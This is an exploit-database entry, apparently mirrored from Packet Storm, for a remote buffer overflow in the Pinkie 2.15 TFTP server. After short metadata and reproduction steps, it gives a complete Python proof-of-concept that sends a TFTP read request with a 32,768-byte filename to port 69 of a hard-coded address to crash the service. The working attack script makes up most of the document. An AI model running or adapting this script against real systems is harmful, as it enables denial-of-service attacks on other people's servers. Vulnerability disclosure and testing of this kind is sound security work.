Exploit for Pinkie 2.15 Remote Buffer Overflow

## https://sploitus.com/exploit?id=PACKETSTORM:165030
# Exploit Title: Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC)  
# Discovered by: Yehia Elghaly  
# Discovered Date: 2021-11-19  
# Vendor Homepage: http://www.ipuptime.net/  
# Software Link : http://ipuptime.net/PinkieSetup.zip  
# Tested Version: 2.15  
# Vulnerability Type: Buffer Overflow (DoS) Remote  
# Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64  
  
# Description: Pinkie 2.15 TFTP Remote Buffer Overflow  
  
# Steps to reproduce:  
# 1. - Download and install Pinkie 2.15  
# 2. - Start TFTP Server listening on port 69  
# 3. - Run the Script from remote PC/IP  
# 4. - Crashed  
  
  
#!/usr/bin/env python3  
  
import socket  
  
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  
  
read = (  
#Request - read  
b'\x00\x01' #Static - opcode  
+ b')' * 32768 + #String - source_file (mutant, size=32768, orig val: b'File.bin')  
b'\x00' #Delim - delim1  
b'netascii' #String - transfer_mode  
b'\x00' #Delim - delim2  
)  
sock.sendto(read, ('192.168.1.207', 69))  
sock.recv(65535)  
  
sock.close()